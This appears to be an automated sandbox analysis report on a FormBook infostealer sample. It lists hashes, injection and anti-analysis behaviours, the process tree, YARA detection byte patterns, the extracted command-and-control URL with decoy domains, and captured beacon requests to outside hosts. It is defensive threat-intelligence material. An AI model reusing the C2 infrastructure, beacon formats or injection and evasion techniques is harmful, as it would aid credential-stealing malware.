
Windows Analysis Report 583475.exe

Overview

General Information

Sample Name: 583475.exe
Analysis ID: 510246
MD5: 721356bfa1f8c23d40f6b2ff77b55db0
SHA1: c4d25b17c64716f2e7558bd302cd901bd63757d8
SHA256: e876c1db90717ff0819f4fc578adace61decdad64963836ebc9ae983dc87a5d6
Tags: exe, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Uses Windows Living Off The Land Binaries (LOLBins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file name differs from the original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • 583475.exe (PID: 5816 cmdline: 'C:\Users\user\Desktop\583475.exe' MD5: 721356BFA1F8C23D40F6B2FF77B55DB0)
    • AddInProcess32.exe (PID: 5540 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • autofmt.exe (PID: 4720 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
      • cmstp.exe (PID: 7120 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
        • cmd.exe (PID: 5216 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.eeeptou.xyz/uat8/"], "decoy": ["suddennnnnnnnnnnn47.xyz", "fggj99.com", "ojosnegroshacienda.com", "tinyhollywood.com", "marketersmeetup.com", "anushreehomemadeproducts.online", "appsdeals14.com", "ocean-breath-retreat.com", "subin-party.com", "offroad.wiki", "coryfairbanks.com", "algurgpaint.net", "k1snks.com", "florakitchens.com", "tollywoodbold.com", "kzkidz.com", "bequestporfze.xyz", "tiplovellc.com", "city-ad.com", "strombolidefilm.com", "789trangchu.xyz", "transfer-news.pro", "wtv864.com", "seospiders.xyz", "bargaingreat.com", "clarysvillemotel.online", "fbiicrc.com", "pf-hi.com", "perverseonline.com", "hugevari.com", "dilekcaglar.online", "authorakkingsley.com", "cloudlessinc.com", "newjourneypro.com", "vacuumcoolingsouthamerica.com", "oursalesguide.com", "shopsoulandstone.com", "circularsmartcity.com", "segwayw.com", "tackle.tools", "tech-franchisee.com", "ff4c2m3vc.xyz", "nlug.net", "artofadhd.zone", "xfqmwk.xyz", "ossname.xyz", "copost.net", "kokosiborsel.quest", "abbastanza.info", "eyehealthtnpasumo4.xyz", "mashburnblog.com", "looped.agency", "atlasgsllc.com", "nimbleiter.com", "nzaz2.xyz", "varundeshpande.com", "foodbevtech.com", "cassandrajasmine.net", "taxunite.com", "hannahhirsh.com", "stonebay.pizza", "xh-kd.com", "tealdazzleshop.com", "wkpnmqfb.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x7c38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x7fc2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x13cd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x137c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x13dd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x13f4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x89da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12a3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9752:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x191c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

Source | Rule | Description | Author | Strings
7.0.AddInProcess32.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.0.AddInProcess32.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.0.AddInProcess32.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
7.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.2.AddInProcess32.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

Sigma detected: CMSTP Execution Process Creation
Source: Process started; Author: Nik Seetharaman; Data: Command: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', CommandLine: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 7120, ProcessCommandLine: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', ProcessId: 5216

          Jbx Signature Overview

          AV Detection:

Found malware configuration
Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.eeeptou.xyz/uat8/"], "decoy": ["suddennnnnnnnnnnn47.xyz", "fggj99.com", "ojosnegroshacienda.com", "tinyhollywood.com", "marketersmeetup.com", "anushreehomemadeproducts.online", "appsdeals14.com", "ocean-breath-retreat.com", "subin-party.com", "offroad.wiki", "coryfairbanks.com", "algurgpaint.net", "k1snks.com", "florakitchens.com", "tollywoodbold.com", "kzkidz.com", "bequestporfze.xyz", "tiplovellc.com", "city-ad.com", "strombolidefilm.com", "789trangchu.xyz", "transfer-news.pro", "wtv864.com", "seospiders.xyz", "bargaingreat.com", "clarysvillemotel.online", "fbiicrc.com", "pf-hi.com", "perverseonline.com", "hugevari.com", "dilekcaglar.online", "authorakkingsley.com", "cloudlessinc.com", "newjourneypro.com", "vacuumcoolingsouthamerica.com", "oursalesguide.com", "shopsoulandstone.com", "circularsmartcity.com", "segwayw.com", "tackle.tools", "tech-franchisee.com", "ff4c2m3vc.xyz", "nlug.net", "artofadhd.zone", "xfqmwk.xyz", "ossname.xyz", "copost.net", "kokosiborsel.quest", "abbastanza.info", "eyehealthtnpasumo4.xyz", "mashburnblog.com", "looped.agency", "atlasgsllc.com", "nimbleiter.com", "nzaz2.xyz", "varundeshpande.com", "foodbevtech.com", "cassandrajasmine.net", "taxunite.com", "hannahhirsh.com", "stonebay.pizza", "xh-kd.com", "tealdazzleshop.com", "wkpnmqfb.com"]}
Yara detected FormBook
Source: Yara match, File source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: 583475.exe, Joe Sandbox ML: detected
Source: 7.0.AddInProcess32.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.AddInProcess32.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.AddInProcess32.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.AddInProcess32.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 583475.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown, HTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49757 version: TLS 1.0
Source: 583475.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: cmstp.pdbGCTL source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
Source: Binary string: AddInProcess32.pdb source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, cmstp.exe, 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmstp.exe
Source: Binary string: cmstp.pdb source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
Source: Binary string: AddInProcess32.pdbpw source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, 00000007.00000000.731556294.0000000000892000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then jmp 067C8B79h
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\583475.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 4x nop then pop edi

          Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.appsdeals14.com
Source: C:\Windows\explorer.exe, Domain query: www.tinyhollywood.com
Source: C:\Windows\explorer.exe, Network Connect: 68.66.224.28 80
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
Performs DNS queries to domains with low reputation
Source: DNS query: www.eeeptou.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.eeeptou.xyz/uat8/
Source: Joe Sandbox View, ASN Name: A2HOSTINGUS A2HOSTINGUS
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    Host: www.google.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD HTTP/1.1
    Host: www.tinyhollywood.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic, HTTP traffic detected:
    GET /uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD HTTP/1.1
    Host: www.appsdeals14.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: unknown, HTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49757 version: TLS 1.0
Source: unknown, Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49757
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Wed, 27 Oct 2021 14:30:57 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "61774856-113"
    Via: 1.1 google
    Connection: close
    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Wed, 27 Oct 2021 14:31:02 GMT
    Server: Apache
    Strict-Transport-Security: max-age=63072000; includeSubDomains
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp, String found in binary or memory: http://ns.ado/1
Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp, String found in binary or memory: http://ns.ado/1E
Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adobe.c/g
Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adobe.c/gE
Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adobe.cobj
Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adobe.cobjE
Source: 583475.exe, 00000000.00000003.658913034.0000000006D81000.00000004.00000001.sdmp, String found in binary or memory: http://ns.d
Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmp, String found in binary or memory: https://www.google.com
Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmp, String found in binary or memory: https://www.google.com/
Source: unknown, DNS traffic detected: queries for: www.google.com
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    Host: www.google.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD HTTP/1.1
    Host: www.tinyhollywood.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic, HTTP traffic detected:
    GET /uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD HTTP/1.1
    Host: www.appsdeals14.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
